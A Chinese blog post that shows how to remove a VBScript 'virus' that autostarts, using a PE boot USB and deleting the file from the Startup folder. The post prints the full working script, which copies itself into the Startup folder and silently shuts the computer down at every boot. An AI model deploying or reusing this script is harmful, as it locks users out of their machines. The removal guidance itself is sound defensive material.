如何删除开机自启动的病毒

已于 2022-02-13 09:03:57 修改
阅读量3.9k 收藏 5
点赞数 4
分类专栏: 反病毒 文章标签: windows 系统安全
于 2022-02-11 20:20:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgy091107/article/details/122886873
版权

P.S.(1)此文中的方法也适用于其他开机自启的病毒。

话说那年,那月,那一天,有一个大佬发了一篇博文 ,结果↓↓↓

啊!可怜的人!我们先来看看那个病毒:

on error resume next 
 
set wr=createobject("scripting.filesystemobject") 
 
set ws=createobject("wscript.shell") 
 
set f = wr.getfile(wscript.scriptfullname) 
 
q=ws.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup") 
 
if not f="Win32.vbs" then wr.copyfile f,q&"\Win32.vbs",true 
 
ws.run"shutdown -p",vbhide

运行一下:

 嗯,果然厉害,开了机就关机。

P.S.(2)这位大佬的病毒怎么样?厉不厉害?如果你想看其他病毒,那么请看此文

不过,还是有解决方法的:

1.打开电脑,狂摁F12(根据电脑机型可能有所不同)

2.插上启动U盘(怎么做启动U盘上网查),然后启动

(如是虚拟机,可能得reset一下(倒数第2项),然后再狂摁F12)

 

 (注:选中(↑、↓键)后摁Enter )

然后等着进度条跑完,最后是这样的:

现在电脑能使了,然后跟我来:

1. 我们分析一下病毒,发现它是通过修改‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup’注册表项来开机自启的。

2.然后我们打开C:\windows\regedit.exe,再打开

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup,发现无效(如图)。

 这是为什么呢?这是因为:注册表里压根没这一项(指PE模式)!

实际上,它是‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup’,其值为C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。(注:****为你的用户名,并且,在PE模式中其值有所不同)

我们打开自己的用户文件夹,然后把‘\AppData’及以后的内容粘贴到导航栏里,如图:

然后,我们发现里面有一个VBS文件,将其删除即可。如图所示:

接着,重启电脑,如图:

 Great!电脑没事啦!!!

P.S.(3) 完成本博文共花了我约1个半小时的时间,非常辛苦,故如果此文帮到了你,请点赞+转发+打赏吧!

P.S.(4)(今天的P.S.真够多的) 版权所有,侵犯必究!

cgy091107
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
开机自启动模块 360无提示.rar
03-12
在计算机系统中,"开机自启动模块"是一个关键的概念,它涉及到系统启动过程中的程序加载。开机自启动模块,顾名思义,是指在操作系统启动时自动运行的程序或服务。这些模块通常由系统管理员或者特定软件设定,以便在...
病毒自启动方式总结
纸房子
10-12 7872
病毒自启动方式总结
终极病毒开机自启,不传播)
Kevin_q8888的博客
05-02 588
病毒,不会有人真机实验吧
c++exe程序在别人电脑上双击无法打开_病毒究竟是怎么自动执行的(上)?
weixin_39605345的博客
11-27 375
电脑病毒一旦入侵到我们的电脑中,需要加载才能造成破坏,因为一个没有加载启动的病毒是没有什么危害的。那么,病毒在进入电脑系统之后,不通过用户双击,会有怎样的办法让自己自动加载执行呢?我们今天就来看一下病毒为了能让自己可以自动加载,一般都会利用哪些方法。了解了病毒自动加载启动,小伙伴们就能够掌握如何发现和清除病毒。一般来说病毒的自动加载技术主要是有两种方式:1、跟随系统的启动而加载。2、跟随程序的启动...
◎Vbs脚本编程简明教程之六—修改注册表
靖海安澜阁
07-16 2851
Vbs中修改注册表的语句主要有: 1、读注册表的关键词和值: 可以通过把关键词的完整路径传递给wshshell对象的regread方法。例如:set ws=wscript.createobject("wscript.shell") v=ws.regread("HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/R
一个病毒注册表的启动项(开机启动)
chy2z的专栏
04-25 1010
Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{247ddd14-367d-11dc-9112-00e04cf6ebf2}\Shell\AutoRun\command]@="C:\\WINDOWS\\sy
C++实现的模拟病毒-自我复制,开机自启
02-12
使用Visual Studio2019编写的C++模拟病毒,它将开机自启,自我复制到C:\\Windows目录,及C:\\Windows\\system32目录,运行cmd.exe等系统工具时如果不加扩展名,将启动本程序,本程序会被360杀毒报毒
Autoruns管理开机自启动项目
05-15
这个工具能够深入到Windows操作系统的各个角落,揭示那些在系统启动时自动运行的程序和服务,帮助用户理解并控制开机自启动的过程,从而优化系统性能、提升安全性。 开机自启动项目通常包括启动目录下的快捷方式、...
windows系统自动启动项管理工具
10-20
此外,对于一些恶意软件或病毒,它们往往会通过篡改启动项来实现持久化驻留,自动启动工具也可以帮助用户发现并移除这些潜在威胁,提高系统的安全性。 具体到提供的文件"Autoruns_14.09_64bit_Single.exe",这很...
开机自启动
07-25
在计算机操作系统中,"开机自启动"是指在系统启动时自动运行特定的程序或服务。这一功能对于系统管理和日常使用非常实用,例如设置防病毒软件、网络连接等关键程序在开机时自动运行,确保系统安全性和高效性。下面将...
网络安全——病毒详解以及批处理01(自启动,修改密码 定时关机,蓝屏,进程关闭)
m0_63715896的博客
12-28 3402
关机bat脚本 计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。 计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。 计算机病毒是一个程序,一段可执行码。就像生物病毒一样,具有自我繁殖、互相传染以及激活再生等生物病毒特征。计算机病毒有独特的复制能力,它们能够快速蔓延,又常常难以根除。它们能把自身附着在
[网络安全自学篇] 九十三.《Windows黑客编程技术详解》之木马开机自启动技术(注册表、计划任务、系统服务)
杨秀璋的专栏
08-15 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第四篇文章主要介绍木马病毒自启动技术,包括注册表、快速启动目录、计划任务和系统服务,希望对您有所帮助。
病毒自启动的方式-笔记不定时更新
sxr__nc的博客
10-26 2028
一般情况下,在用户点击运行病毒程序之后,病毒才会运行起来,而在大多数情况下,病毒程序在用户运行过后就会对用户的计算机进行某些修改来隐藏自己或者是在用户不知情的情况下运行病毒自身。 举几个例子: 1、在病毒运行之后,修改注册表实现自启动 2、病毒运行之后,实现自删除(其实在这个时候大多数的情况应该是病毒将自身复制到其他的路径下)来伪装自己。 3、设置计划任务 那么能够让病毒修改启动项之后进行自动运行...
Vbs脚本编程简明教程
hereson
04-12 742
—为什么要使用Vbs? 在Windows中,学习计算机操作也许很简单,但是很多计算机工作是重复性劳动,例如你每周也许需要对一些计算机文件进行复制、粘贴、改名、删除,也许你每天启动计算机第一件事情就是打开WORD,切换到你喜爱的输入法进行文本编辑,同时还要播放优美的音乐给工作创造一个舒心的环境,当然也有可能你经...
注意Windows注册表里加载的病毒和流氓软件!
leehq的专栏
09-01 6216
现在恶意和带毒的网站越来越多,让人防不胜防。而各种恶意软件要寄生在Windows系统中,最常用的手段就是修改注册表。由于Windows的注册表里加载程序的项目繁多,因此查找起来相当困难。总结我帮人清除病毒的经历,发现以下注册表项最容易让病毒利用。 1. 通过IE加载HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Ex
三十二个vbs整蛊代码,好玩到没朋友
热门推荐
babymua的博客
09-04 3万+
恶作剧的vbs代码,这里提供的都是一些死循环或导致系统死机的vbs对机器没坏处,最多关机重启一下就可以了,将下面的任意一段代码保存为*.vbs即可 对大数据以及人工智能概念都是模糊不清的,该按照什么线路去学习,学完往哪方面发展,想深入了解,想学习的同学欢迎加入大数据学习qq群:1044907824,有大量干货(零基础以及进阶的经典实战)分享给大家,并且有清华大学毕业的资深大数据讲师给大家免费授课,给大家分享目前国内最完整的大数据高端实战实用学习流程体系 。 操作方法:把代码保存为*.VBS运行即可经本人亲自
计算机病毒能否自动启动,电脑突然自动开机,中病毒么?
weixin_39868414的博客
07-15 424
应该不是自动开机,应该是系统出了什么故障,自动重启了。也许是中了病毒或木马。HijackThis v1.99.2下载地址:http://www.crsky.com/soft/4599.html木马杀客下载地址:http://www.mmsk.cn/Down.htmlEwido下载地址:http://www.51ct.cn/downinfo/585.html卡巴斯基下载地址:http://www.c...
C++设置取消程序开机自启动
刘千予
06-30 901
/****************************************************************************************** Function: CancelAutoStart Description: 设置取消程序开机自启动 **********************************************...
windows bat开机自启动
最新发布
05-01
要让Windows上的批处理文件(.bat文件)在开机自启动,可以按以下步骤操作: 1. 打开启动文件夹。可以按Win+R组合键,输入"shell:startup"然后按Enter,即可打开启动文件夹。 2. 在启动文件夹中创建批处理文件的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值